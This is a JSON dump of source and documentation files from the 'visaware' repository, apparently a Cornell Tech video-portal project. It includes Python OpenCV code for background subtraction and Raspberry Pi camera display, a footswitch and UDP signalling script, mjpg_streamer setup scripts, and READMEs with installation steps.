[ { "alpha_fraction": 0.5726072788238525, "alphanum_fraction": 0.5866971015930176, "avg_line_length": 34.01333236694336, "blob_id": "580a6dd6e0a1eab3f59f428063d9fbac8623aa27", "content_id": "659ee27cebd3e41dcaea2abf25697ce9213248ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7878, "license_type": "no_license", "max_line_length": 79, "num_lines": 225, "path": "/active_wall/active_wall.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"knn.py\"\"\"\n\nimport time\nimport sys\nimport cv2\nimport numpy as np\nfrom gray import Gray\n\n# a silhouette can not have MORE than this number of pixels\nNO_MORE_THAN = 30000\n# a silhouette can not have LESS than this number of pixels\nNO_LESS_THAN = 10000\n# a silhouette cannot be closer than INNER_MARGIN pixels from the border\nINNER_MARGIN = 10\n\n# KNN background subtractor history param\nKNN_HISTORY = 10\n# KNN background subtractor threshold param\nKNN_THRESH = 500.0\n\n# Min # of nonzero pixels for us to believe there's motion\nMOTION_MIN_NNZ = 100\n\n# how long do we wait before we start timing things?\nIDLE_START_TIME = 0.5\n\n# vertical margin for drawing\nHEIGHT_MARGIN = 100\n\n# if TIME_DECAY_FACTOR < 1.0, the image values are less bright by this fraction\n# if TIME_DECAY_FACTOR == 1.0, the image decays completely on every frame\nTIME_DECAY_FACTOR = 0.0001\n\n# how much to decay all other people by (i.e. to multiply them by\n# PERSON_DECAY_FACTOR) when a new person comes into the picture\nPERSON_DECAY_FACTOR = 0.8\n\n# number of pixels to translate to the right each time\nHORIZONTAL_TRANSLATION = 30\n\nclass MaxKNN(Gray):\n \"\"\"KNN background subtraction\"\"\"\n def __init__(self, stream, *args, **kwargs):\n super().__init__(stream, *args, **kwargs)\n self.fgbg = cv2.createBackgroundSubtractorKNN(\n KNN_HISTORY, KNN_THRESH, False)\n self.start_time = time.time()\n self.moving = False\n self.max_nnz = 0\n self.max_i = 0\n self.subimg = None\n self.i_frame = 0\n self.disp_img = None\n self.start_x = 0\n self.last_time = time.time()\n\n def process_frame(self, frame):\n \"\"\"KNN background subtraction\"\"\"\n\n cv2.imshow('normal', frame)\n cv2.waitKey(1)\n\n gray = super().process_frame(frame)\n\n knn_img = self.fgbg.apply(gray)\n\n nnz = cv2.countNonZero(knn_img)\n\n frame_shape = frame.shape\n img_h = frame_shape[0]\n img_w = frame_shape[1]\n\n if self.disp_img is None:\n self.disp_img = np.zeros((img_h, img_w))\n\n rect = cv2.boundingRect(knn_img)\n bb_x, bb_y, bb_w, bb_h = rect\n\n # Keep track of subimage with max nonzero # of pixels:\n # this block checks if the number of nonzero (background difference)\n # pixels amount and location satisfies what we think would be an ok\n # silhouette. if it does satisfy those conditions, then we remember\n # the sub-image that had it, plus the number of nnz pixels is\n # remembered - it is the max nnz, because one of the conditions for\n # nnz is that it is greater than the max so far\n if nnz > self.max_nnz and \\\n nnz < NO_MORE_THAN and \\\n nnz > NO_LESS_THAN and \\\n bb_x > INNER_MARGIN and \\\n bb_x + bb_w < img_w - INNER_MARGIN:\n\n # print('- found next candidate: ', self.grabbed_frame_num())\n # found the next candidate silhouette to use\n self.max_nnz = nnz\n\n # crop rect into max_img\n # self.subimg = knn_img.copy()\n self.subimg = cv2.convertScaleAbs(\n knn_img[bb_y:bb_y + bb_h, bb_x:bb_x+bb_w])\n\n # TODO: why returning knn_img here? we should return a zero image here\n # instead\n if time.time() - self.start_time < IDLE_START_TIME:\n # Do nothing for the first IDLE_START_TIME seconds\n time.sleep(IDLE_START_TIME / 10.0)\n return knn_img\n\n # this block detects motion changes (on->off / off->on) and as soon\n # as it sees the on->off\n if nnz > MOTION_MIN_NNZ:\n if not self.moving:\n # there's some motion but self.moving is off so this means\n # we have just detected an off->on switch\n print('Motion change: OFF --> ON')\n self.moving = True\n self.max_nnz = 0\n elif self.moving:\n # no motion whatsoever, but self.moving is true so this means\n # we have just detected an on->off switch\n now = time.time()\n delta_time = now - self.last_time\n self.last_time = now\n \n print('Motion change: ON --> OFF ', delta_time)\n \n self.moving = False\n \n self.disp_img, self.start_x = self.draw_silhouette(\n self.disp_img,\n self.subimg,\n self.start_x\n )\n\n self.disp_img = (1.0 - TIME_DECAY_FACTOR) * self.disp_img\n\n return cv2.convertScaleAbs(self.disp_img)\n\n def center_image(self, img):\n \"\"\"recenters everything via bounding rect\"\"\"\n img_height, img_width = img.shape[:2]\n rect = cv2.boundingRect(img)\n bb_x, bb_y, bb_w, bb_h = rect\n\n if bb_w == 0:\n return img\n\n left_margin = bb_x\n right_margin = img_width - (bb_x + bb_w)\n\n # print('bb_x', bb_x, ' - bb_w', bb_w)\n # print('left', left_margin, ' - right', right_margin)\n\n if left_margin > 0 and left_margin >= right_margin:\n # translate left by left_margin\n translation = -0.5 * left_margin\n print('case 1', translation)\n translation_mat = np.float32([[1, 0, translation], [0, 1, 0]])\n img = cv2.warpAffine(img, translation_mat, (img_width, img_height))\n elif right_margin > 0 and right_margin >= left_margin:\n # translate right by right_margin/2\n translation = 0.5 * right_margin\n print('case 2', translation)\n translation_mat = np.float32([[1, 0, translation], [0, 1, 0]])\n img = cv2.warpAffine(img, translation_mat, (img_width, img_height))\n\n return img\n\n def draw_silhouette(self, img, subimg, start_x):\n \"\"\"draw_silhouette\"\"\"\n print('draw_silhouette(img, subimg, start_x=%d)' % start_x);\n\n img_height, img_width = img.shape[:2]\n\n subimg_height, subimg_width = subimg.shape[:2]\n\n # horizontal_translation = np.floor(0.5 * subimg_width)\n horizontal_translation = HORIZONTAL_TRANSLATION\n\n desired_subimg_height = img_height - 2 * HEIGHT_MARGIN\n\n if desired_subimg_height != subimg_height:\n factor = desired_subimg_height / subimg_height\n print('resizing height from %d to %d, factor: %f' %\n (subimg_height, desired_subimg_height, factor))\n subimg = cv2.resize(subimg, (0, 0), fx=factor, fy=factor)\n subimg_height, subimg_width = subimg.shape[:2]\n\n end_x = start_x + subimg_width\n start_y = HEIGHT_MARGIN\n end_y = HEIGHT_MARGIN + subimg_height\n\n delta_x = end_x - img_width\n # check and fix for special case (which ends up being the main case\n # once we reach it) where you've reached the right end of the image\n if delta_x > 0:\n print('SURPASSED: DRAWING SUBIMG AT RHS END')\n # shift img to left first\n translation_mat = np.float32([[1, 0, -delta_x], [0, 1, 0]])\n img = cv2.warpAffine(img, translation_mat, (img_width, img_height))\n # also modify start_x and end_x for smaller subimg\n start_x = img_width - subimg_width\n end_x = img_width\n\n img = img * PERSON_DECAY_FACTOR\n\n # grab the subwindow we will partially overwrite from the image\n prev_subimg = img[start_y:end_y, start_x:end_x]\n\n # mask has nonzero pixels of subimg\n mask = subimg != 0\n\n prev_subimg[mask] = subimg[mask]\n\n # cv2.imshow('prev_subimg', prev_subimg)\n\n img[start_y:end_y, start_x:end_x] = prev_subimg\n\n # img = cv2.convertScaleAbs(img)\n # img = self.center_image(img)\n\n return img, start_x + horizontal_translation\n\nif __name__ == '__main__':\n MaxKNN(sys.argv[1]).start()\n" }, { "alpha_fraction": 0.5196881294250488, "alphanum_fraction": 0.5265107154846191, "avg_line_length": 38.76744079589844, "blob_id": "1e8966344a701b066085f96f6aae1fdca329a589", "content_id": "672ba487c62bd4da787bea68008f1c5668dc4b7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10260, "license_type": "no_license", "max_line_length": 80, "num_lines": 258, "path": "/pishow/src/avg_frames_on_button_click.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"avg_frames_on_button_click.py\"\"\"\n\nimport sys\nimport time\nimport socket\nimport requests\nfrom threading import Thread, ThreadError\nimport RPi.GPIO as GPIO\nimport cv2\nimport numpy as np\nfrom avg_frames import AvgFrames\nfrom on_off_timer import OnOffTimer\n\n\n################################################################################\n# Visualization related globals\n################################################################################\n\nWINDOW_NAME = 'cam'\n\n# the number of seconds we wait for the camera stream until we decide\n# that there is no connection\nCAM_REQUEST_TIMEOUT = 3.0\n\n# path to image we show when there is no activity\nSPLASH_IMAGE_PATH = '/home/pi/workspace/visaware/pishow/src/splash.jpg'\n\nNO_CAM_IMAGE_PATH = '/home/pi/workspace/visaware/pishow/src/no_cam.jpg'\n\n################################################################################\n# Sockets-related globals\n################################################################################\n\n# One pishow (this one) is the socket server, the other pishow is socket client.\nSOCKET_PORT = 5005\n# we only send one byte at a time\nSOCKET_BUFFER_SIZE = 1\n# the number of seconds after receiving a message from the other board\n# (telling us that it just turned on) during which we will turn on this\n# board's showing machinery. i.e. we display with this board if the other\n# board has sent a message less than SOCKET_RECEIVE_TIME_THRESHOLD\n# seconds. This keeps projection on this board in \"on\" state for at least\n# (SOCKET_RECEIVE_TIME_THRESHOLD seconds) time.\nSOCKET_RECEIVE_TIME_THRESHOLD = 60.0\n# how long to sleep between each time you listen to a socket\nSOCKET_SERVER_THREAD_SLEEP = 0.1\n\n################################################################################\n# GPIO-related globals\n################################################################################\n\nGPIO_PIN = 18\n\n################################################################################\n# Time-related globals\n################################################################################\n\n# timer on-state duration\nTIMER_ON_SECONDS = 120\n# timer off-state duration\nTIMER_OFF_SECONDS = 3480\n# minimum duration to show the other side pisee\nMIN_SECONDS_ON = 45\n\nTOO_LONG_AGO = -1\n\nclass AvgFramesOnButtonClick():\n \"\"\"Show avg frames when switch is on, otherwise show splash screen\"\"\"\n def __init__(self, arguments):\n self.my_ip = arguments[1]\n self.other_ip = arguments[2]\n self.webcam_url = arguments[3]\n self.fullscreen_size = (int(arguments[4]), int(arguments[5]))\n\n cv2.namedWindow(WINDOW_NAME, cv2.WND_PROP_FULLSCREEN)\n cv2.setWindowProperty(WINDOW_NAME, cv2.WND_PROP_FULLSCREEN,\n cv2.WINDOW_FULLSCREEN)\n\n self.no_activity_frame = cv2.imread(SPLASH_IMAGE_PATH)\n self.no_cam_frame = cv2.imread(NO_CAM_IMAGE_PATH)\n\n self.timer = OnOffTimer(TIMER_ON_SECONDS, TIMER_OFF_SECONDS)\n self.avg_frames = AvgFrames(None)\n self.last_footstep_time = TOO_LONG_AGO\n self.last_gpio_state = None\n\n # GPIO setup\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(GPIO_PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n # Start socket listening\n self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.last_socket_receive_time = None\n self.stream = None\n self.start_server_socket_thread()\n self.start_cam_thread()\n\n\n def start_cam_thread(self):\n # try:\n # self.stream = requests.get(self.webcam_url, stream=True,\n # timeout=2.0)\n # except requests.exceptions.ConnectTimeout:\n # self.stream = None\n thread = Thread(target=self.cam_thread_worker)\n thread.start()\n\n def cam_thread_worker(self):\n bytes = b''\n while True:\n if self.stream is None:\n # we have no stream\n try:\n self.stream = requests.get(self.webcam_url, stream=True,\n timeout=CAM_REQUEST_TIMEOUT)\n except (requests.exceptions.ConnectTimeout,\n requests.exceptions.ConnectionError) as err:\n self.stream = None\n print('Error: camera stream unavailable at URL %s\\n%s' %\n (self.webcam_url, err))\n cv2.imshow(WINDOW_NAME, self.no_cam_frame)\n cv2.waitKey(1)\n sys.stdout.flush()\n time.sleep(2)\n else:\n # we have a stream\n try:\n chunk = self.stream.raw.read(1024)\n\n if not chunk:\n print('NO chunk!')\n sys.stdout.flush()\n self.stream = None\n\n bytes += chunk\n\n a = bytes.find(b'\\xff\\xd8')\n b = bytes.find(b'\\xff\\xd9')\n if a != -1 and b != -1:\n jpg = bytes[a:b+2]\n bytes= bytes[b+2:]\n img = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8),\n cv2.IMREAD_COLOR)\n\n # here's where we process the frame\n img = self.process_frame(img)\n\n cv2.imshow(WINDOW_NAME, img)\n if cv2.waitKey(1) == 27:\n print('Shutting down because user hit ESC ...')\n sys.stdout.flush()\n sys.exit(0)\n\n # except ThreadError as err:\n except:\n print('Camera grabbing thread error: ', sys.exc_info())\n sys.stdout.flush()\n\n\n def start_server_socket_thread(self):\n \"\"\"Start thread that listens on a socket\"\"\"\n try:\n self.server_socket.bind((self.my_ip, SOCKET_PORT))\n except OSError as os_error:\n print('Error: cannot bind to own IP. Are you sure %s is my IP?' %\n self.my_ip)\n sys.exit(-1)\n thread = Thread(target=self.server_socket_thread_worker, args=())\n thread.daemon = True\n thread.start()\n\n def server_socket_thread_worker(self):\n \"\"\"Socket listening thread main loop\"\"\"\n while True:\n # the next line is a blocking call\n data, address = self.server_socket.recvfrom(1)\n print('received data: ', data, ', address: ', address, ', time: ',\n time.strftime('%X'))\n sys.stdout.flush()\n self.last_socket_receive_time = time.time()\n time.sleep(SOCKET_SERVER_THREAD_SLEEP)\n\n def tell_other_i_just_turned_on(self):\n \"\"\"Send message telling other pishow that I've just started\"\"\"\n self.client_socket.sendto(b'1', (self.other_ip, SOCKET_PORT))\n\n def process_frame(self, frame):\n \"\"\"Returns average of all frames after updating with weighted frame\"\"\"\n gpio_state = GPIO.input(GPIO_PIN)\n\n just_switched_gpio_state = False\n if gpio_state != self.last_gpio_state:\n self.just_switched_gpio_state = True\n print('new GPIO state: ', gpio_state, ', time: ',\n time.strftime('%X'))\n self.last_gpio_state = gpio_state\n\n # determine whether our timer module is currrently on or not\n # and whether it just switched states (since the last time we checked)\n timer_is_on, just_switched_timer_state = self.timer.is_on()\n\n if just_switched_timer_state:\n print('Timer just switched state.')\n\n if self.last_socket_receive_time is not None:\n time_since_message_arrived = (time.time() -\n self.last_socket_receive_time)\n else:\n time_since_message_arrived = float('inf')\n\n received_on_message = (time_since_message_arrived <\n SOCKET_RECEIVE_TIME_THRESHOLD)\n\n # if the timer says we should be on, we turn on, regardless of anything\n # else. same goes for if we have just received a message to turn on\n if received_on_message or timer_is_on:\n frame = self.avg_frames.process_frame(frame)\n else:\n # we have no reason to turn on camera other than local footswitch\n if gpio_state == 1:\n # not stepping on footswitch\n if self.last_footstep_time == TOO_LONG_AGO:\n # not stepping on footswitch and last time is too long ago\n frame = self.no_activity_frame\n else:\n # not stepping on footswitch, check if within MIN_SECONDS_ON\n delta_time = time.time() - self.last_footstep_time\n if delta_time < MIN_SECONDS_ON:\n # within MIN_SECONDS_ON so show real stuff\n frame = self.avg_frames.process_frame(frame)\n else:\n # not within MIN_SECONDS_ON so show no activity\n print('DISENGAGE (DELTA_TIME > %ds), time: %s' %\n (MIN_SECONDS_ON, time.strftime('%X')))\n frame = self.no_activity_frame\n self.last_footstep_time = TOO_LONG_AGO\n else:\n # stepping on footswitch\n frame = self.avg_frames.process_frame(frame)\n if self.last_footstep_time == TOO_LONG_AGO:\n print('ENGAGE (STEPPED ON MAT), time: %s' %\n time.strftime('%X'))\n self.tell_other_i_just_turned_on()\n # this ensures that only when we switch from state 0 to\n # an on state we will record self.last_footstep_time\n self.last_footstep_time = time.time()\n\n sys.stdout.flush()\n\n return cv2.resize(frame, self.fullscreen_size)\n\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n AvgFramesOnButtonClick(sys.argv)\n" }, { "alpha_fraction": 0.7367088794708252, "alphanum_fraction": 0.7617088556289673, "avg_line_length": 70.81818389892578, "blob_id": "e52cede3325399bfa985040df58199d5f382eecf", "content_id": "93b6ab2951e7d0866fbf135f66cf488134eeca36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3160, "license_type": "no_license", "max_line_length": 231, "num_lines": 44, "path": "/doc/LINKS.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "# Relevant links\n\nHere is where we share any links that are relevant to our work on this project.\n\n* [Raspberry Pi camera bandwidth and quality discussion](https://www.raspberrypi.org/forums/viewtopic.php?f=43&t=136292)\n* [picamera documentation](https://picamera.readthedocs.io/en/release-1.13/)\n* [Video bandwidth calculations](https://www.mistralsolutions.com/video-surveillance-bandwidth-requirements-calculation-utilization/)\n* [mjpg_streamer installation](https://blog.miguelgrinberg.com/post/how-to-build-and-run-mjpg-streamer-on-the-raspberry-pi)\n* [raspicam (C++)](https://github.com/cedricve/raspicam)\n* [uv4l installation](http://www.linux-projects.org/uv4l/installation/) - not used for now. Not working after a major attempt.\n* [OpenCV installation on Rasperry Pi](https://www.pyimagesearch.com/2017/09/04/raspbian-stretch-install-opencv-3-python-on-your-raspberry-pi/) - this link works for OpenCV v 3.3.1. This is what we used.\n* [12 micro SD cards tested with Raspberry Pi](https://www.geek.com/chips/a-geek-tests-12-micro-sd-cards-with-a-raspberry-pi-to-find-the-fastest-1641182/)\n\n### Using OpenCV on pishow\n* [Official OpenCV docs](https://docs.opencv.org/3.0-beta/doc/py_tutorials/py_gui/py_video_display/py_video_display.html)\n* [Python example 1](http://petrkout.com/electronics/low-latency-0-4-s-video-streaming-from-raspberry-pi-mjpeg-streamer-opencv/) - this is the main one that shows how to decode a stream using `urllib`\n* [Python example 2](https://www.learnopencv.com/read-write-and-display-a-video-using-opencv-cpp-python/)\n* [Python example 3](http://www.chioka.in/python-live-video-streaming-example/)\n\n#### CV Processing\n* [Background subtraction](https://docs.opencv.org/3.1.0/db/d5c/tutorial_py_bg_subtraction.html) - using `BackgroundSubtractorMOG2`\n* [FPS python code](https://www.learnopencv.com/how-to-find-frame-rate-or-frames-per-second-fps-in-opencv-python-cpp/)\n\n#### System setup related\n* [SD card images](https://softwarebakery.com/shrinking-images-on-linux)\n\n#### Prevent Raspberry Pi from falling asleep\n* [This discussion so far did not work - tried all steps up to last one, hopefully this last step will do the job](https://www.bitpi.co/2015/02/14/prevent-raspberry-pi-from-sleeping/)\n\n#### Multi-threading to increase FPS\n* [Arnaud's pointer for increasing FPS via THREADING](https://www.pyimagesearch.com/2015/12/21/increasing-webcam-fps-with-python-and-opencv/)\n\n#### Matt Law's pointer to Global Interpreter Lock in Python\n* [We may have to revisit this issue so the link is here](https://opensource.com/article/17/4/grok-gil)\n* [For GIL, see also](https://en.wikipedia.org/wiki/Global_interpreter_lock)\n\n#### Latency issue (FPS is up, but huge delays) and solution\n* [This is the code on which we're basing all camera grabbing at this point - this is what fixed the latency issue finally - another multithreaded solution.](http://benhowell.github.io/guide/2015/03/09/opencv-and-web-cam-streaming)\n\n#### For later (latency / FPS best solution)\n\nThis one approach may be useful, also look at H.264 and other codecs\n\n* [Video streaming with FLASK](https://github.com/log0/video_streaming_with_flask_example)\n" }, { "alpha_fraction": 0.686274528503418, "alphanum_fraction": 0.686274528503418, "avg_line_length": 51, "blob_id": "99110132204ebcdece296c5c88c705b074dd7c25", "content_id": "2aa0611ca95ab9fc68315c819727af493cf4b769", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 51, "num_lines": 1, "path": "/pishow/src/video_stream_abc.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "../../../opencv-video-loops/src/video_stream_abc.py" }, { "alpha_fraction": 0.6951612830162048, "alphanum_fraction": 0.698387086391449, "avg_line_length": 40.36666488647461, "blob_id": "55a231342fa55d436cebc21bdb97f53fd9c1b258", "content_id": "0134afe4d9fb773e579b7f6c2c5edcedf913b54f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1240, "license_type": "no_license", "max_line_length": 128, "num_lines": 30, "path": "/README.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "# visaware\n\nThis repository contains all source code for the Visual Awareness project.\n\nDeveloped at the [Cornell Tech\nConnected Experiences Laboratory](http://cx.jacobs.cornell.edu/).\n\nCode by Doron Tal (2018) for a project with \nBenedetta Piantella and [Mor\nNaaman](https://people.jacobs.cornell.edu/mor/) at the Cornell\nTech [Connected Experiences\nLaboratory](http://cx.jacobs.cornell.edu/). The work of the lab is generously supported by\n[OATH](https://www.oath.com/).\n\n## Introduction\n\nThis repository contains internally used code for driving the video portal. It is using some code from repository \n[https://github.com/cornelltech/opencv-video-loops](https://github.com/cornelltech/opencv-video-loops).\n\n\n## Contents\n\nThis section of this README file describes how files are arranged in\nthis folder.\n\nFile or directory name | Purpose\n---------------------- | -------\ndata/ | Contains sample videos for computer vision development\ndoc/ | Miscellaneous documentation and system setup documents that may be of use\npisee/ | Raspberry Pi that's connected to a camera - little dev here, just the parameters used for mjpg_streamer\npishow/ | -\"- connected to a projector." }, { "alpha_fraction": 0.6659959554672241, "alphanum_fraction": 0.7022132873535156, "avg_line_length": 40.41666793823242, "blob_id": "1f4a80ccf1d42c3800b364c6727434cb2cd83496", "content_id": "8fb38199745b7d18555e7a79839b023db17b1c1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 994, "license_type": "no_license", "max_line_length": 121, "num_lines": 24, "path": "/pisee/src/run_mjpg_streamer.sh", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# this is the script that runs mjpeg_streamer as user pi every time\n# this device boots. it is called from /etc/rc.local during the boot\n# process.\n\n# this script contains all the command-line arguments that we want to supply\n# mjpeg_streamer for our operations. to change the command-line arguments of\n# mjpeg_streamer server, change them here and only here.\n\n# NOTE: mjpeg_streamer has been installed in user 'pi' home directory.\n# The final install step 'sudo make install' put files under /usr/local/\n\n# mjpg_streamer -i \"input_raspicam.so -x 640 -y 480 -fps 30 -br 90 -co 100 -ifx watercolour\" -o \"output_http.so -w ./www\"\n\n# add instead -i \"input_uvc.so -r 1080x720 -n\" or any other resolution for USB webcam \n#also adding effects: for example -ifx sketch\n# mjpg_streamer \\\n# -i \"input_raspicam.so -awb -x 640 -y 480 -fps 30\" \\\n# -o \"output_http.so -w ./www\"\n\nmjpg_streamer \\\n -i \"input_raspicam.so -awb -x 640 -y 480 -fps 30\" \\\n -o \"output_http.so -w ./www\"\n" }, { "alpha_fraction": 0.6851851940155029, "alphanum_fraction": 0.6851851940155029, "avg_line_length": 31.399999618530273, "blob_id": "e91b835c91ea94ac203eedc566aa1a3e0e43d5e1", "content_id": "569f40b623f029a1f6b0bc92e2ab81294e8e70fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 324, "license_type": "no_license", "max_line_length": 146, "num_lines": 10, "path": "/pisee/src/README.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "## pisee/src/\n\n## Contents\n\nThis section of this README file describes how files are arranged in\nthis folder.\n\nFile or directory name | Purpose\n---------------------- | -------\nrun_mjpeg_streamer.sh | Wrapper script, which we put (or link to) in /home/pi/bin, to run mjpeg_streamer with our choice of command-line arguments\n" }, { "alpha_fraction": 0.6531986594200134, "alphanum_fraction": 0.6531986594200134, "avg_line_length": 32, "blob_id": "1c1e588dda8fc7ea5e37b05fa38a4356b8396cd7", "content_id": "a550618cba9dedaf2d51732d712eda7309f60418", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 297, "license_type": "no_license", "max_line_length": 80, "num_lines": 9, "path": "/doc/README.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "## Contents\n\nThis section of this README file describes how files are arranged in\nthis folder.\n\nFile or directory name | Purpose\n---------------------- | -------\nLINKS.md | URLs relevant to the project\nip_layout.png | The IP numbers of the four boards we have set up at Cornell Tech\n" }, { "alpha_fraction": 0.6315789222717285, "alphanum_fraction": 0.6315789222717285, "avg_line_length": 38, "blob_id": "952da917baf0ad892270c375664159c95f56965d", "content_id": "ed6c4a26f7d47369a7efe4f6af9d6c50e9d6bbfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "no_license", "max_line_length": 38, "num_lines": 1, "path": "/pishow/src/fps.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "../../../opencv-video-loops/src/fps.py" }, { "alpha_fraction": 0.6696654558181763, "alphanum_fraction": 0.6769749522209167, "avg_line_length": 39.42045593261719, "blob_id": "d496bf9ea50d3dc153a92fc091ddf84eb06be7c3", "content_id": "b9e18930334c1a41ddb1832ec4adf905b2737a43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3557, "license_type": "no_license", "max_line_length": 102, "num_lines": 88, "path": "/pisee/INSTALL.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "# pysee installation\n\n1) Download latest version of Raspbian OS image and install it via instructions\n [here](https://www.raspberrypi.org/documentation/installation/installing-images/README.md).\n2) Insert the newly created SD card into the Raspberry Pi and boot it with a\n connected monitor, keyboard and mouse. It should end boot showing user pi's\n desktop.\n3) Turn off bluetooth via the desktop's top right bluetooth icon\n4) Request static IP addresses from [email protected] by giving them\n the MAC address of your device, which you can find by issuing the command \n `ifconfig` and looking for the 'HW Addr' entry in the section that\n corresponds to device `ethX` (typically `eth0`)\n5) While you wait for static IP, to continue setting thigns up,\n connect via Wi-Fi via the top right WiFi icon\n6) Start a shell (click on the terminal icon on the top right) and \n upgrade / update system packages:\n ```\n sudo apt update\n sudo apt upgrade\n ```\n7) Change the keyboard layout from UK (Raspberry Pi default) to a US keyboard.\n To do this, first type in a shell on the Pi:\n ```\n sudo dpkg-reconfigure keyboard-configuration\n ```\n Choose \"Generic 104 key\" for most US keyboards. Choose US keyboard next -\n pick the default one (top of the list).\n8) Fix the clock to have the correct time zone via\n ```\n sudo dpkg-reconfigure tzdata\n ```\n9) Configure the board with\n ```\n sudo raspi-config\n ```\n Here we want to\n * Enable the camera\n * Set the board's hostname to `pysee`\n * Set password for user `pi`\n10) Clone the git repository `visaware` under institution `cornelltech` on \n github.\n ```\n mkdir /home/pi/workspace\n cd /home/pi/workspace\n git clone http://github.com/cornelltech/visaware\n ```\n11) Create two directories under `/home/pi`: \n\n File or directory name | Purpose\n ---------------------- | -------\n `bin/` | Scripts that user `pi` may want to run\n `workspace/` | Software that user `pi` may want to build\n12) Grab the visaware repository:\n ```\n cd /home/pi/workspace\n git clone https://github.com/cornelltech/visaware\n ```\n12) On `pisee` boards (ones with a camera) you will need `mjpeg_streamer` - \n here is how you build it: \n * Build `mjpg-streamer` in a subdirectory of \n `workspace/`, using this experimental (raspicam) version: \n [https://github.com/jacksonliam/mjpg-streamer/](https://github.com/jacksonliam/mjpg-streamer/). \n Use the instructions at the root of the github repository \n (a la README.md file there). NOTE: use the `cmake` version of the build\n instructions, i.e, build via `cmake` first. Here's a transcript:\n ```\n sudo ap install cmake libjpeg8-dev\n cd /home/pi/workspace/\n git clone https://github.com/jacksonliam/mjpg-streamer\n cd mjpg-streamer/mjpg-streamer-experimental\n mkdir _build\n cd _build\n export LD_LIBRARY_PATH=.\n cmake ..\n make\n sudo make install\n ```\n which will place installed executable under `/usr/local/mjpg_streamer`\n * Link the wrapper script `run_mjpeg_streamer.sh`, where we set the\n command-line arguments we run `mjpeg-streamer` with, by issuing:\n ```\n ln -s /home/pi/workspace/visaware/pisee/src/run_mjpg_streamer.sh /home/pi/bin/\n ```\n13) Set up the machine for automatically starting mjpeg-streamer upon boot \n (headless or not). For this just add the following line to `/etc/rc.local`:\n ```\n /home/pi/bin/run_mjpg_streamer.sh > /dev/null 2>&1\n ```\n" }, { "alpha_fraction": 0.6465256810188293, "alphanum_fraction": 0.6465256810188293, "avg_line_length": 32.099998474121094, "blob_id": "384e741df4b6f3827bfa99578a1170565c46c0c6", "content_id": "b43d20a4f0746ed5e59874a3fdada0c9ec143e96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 331, "license_type": "no_license", "max_line_length": 83, "num_lines": 10, "path": "/pisee/README.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "# pisee\n\nThis directory contains all files, code, notes and documentation related to the \nthe Raspberry Pi board grabbing the video.\n\n## Contents\nFile or directory name | Purpose\n---------------------- | -------\nREADME.md | This file\nINSTALL.md | Installation instructions for setting up the 'pysee' board\n" }, { "alpha_fraction": 0.6499999761581421, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 40, "blob_id": "854c6bf378d08404bc12f22f27ed4682c8021dcb", "content_id": "f9cb6c046dd9af8378d60248d55443ec77b2747d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40, "license_type": "no_license", "max_line_length": 40, "num_lines": 1, "path": "/pishow/src/pacer.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "../../../opencv-video-loops/src/pacer.py" }, { "alpha_fraction": 0.8121212124824524, "alphanum_fraction": 0.8121212124824524, "avg_line_length": 40.25, "blob_id": "e527549bed68e3fc52ba5937ac01a9aa2972d86d", "content_id": "6f8ff4695657938910b86cd698179b58f207d959", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 165, "license_type": "no_license", "max_line_length": 80, "num_lines": 4, "path": "/pishow/README.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "# visaware/pishow/\n\nThis directory contains all files, code, notes and documentation related to the \nthe Raspberry Pi board showing/displaying/projecting the video.\n" }, { "alpha_fraction": 0.6704645156860352, "alphanum_fraction": 0.70201575756073, "avg_line_length": 41.25925827026367, "blob_id": "2cf0e28a819299f57885a12c7a3e28d3cf856c4e", "content_id": "d4c16f3f7da7d785905e3b072ecaca38a797e42d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1141, "license_type": "no_license", "max_line_length": 109, "num_lines": 27, "path": "/pishow/src/README.md", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "## visaware/pishow/src/\n\nThis directory contains all source code running on the pishow board\nfor the visaware project.\n\n### Installation - get a pishow board up and running\n1) Get an SD-card with Raspbian OS installed on it to boot with\n *Current version is Raspbian 9 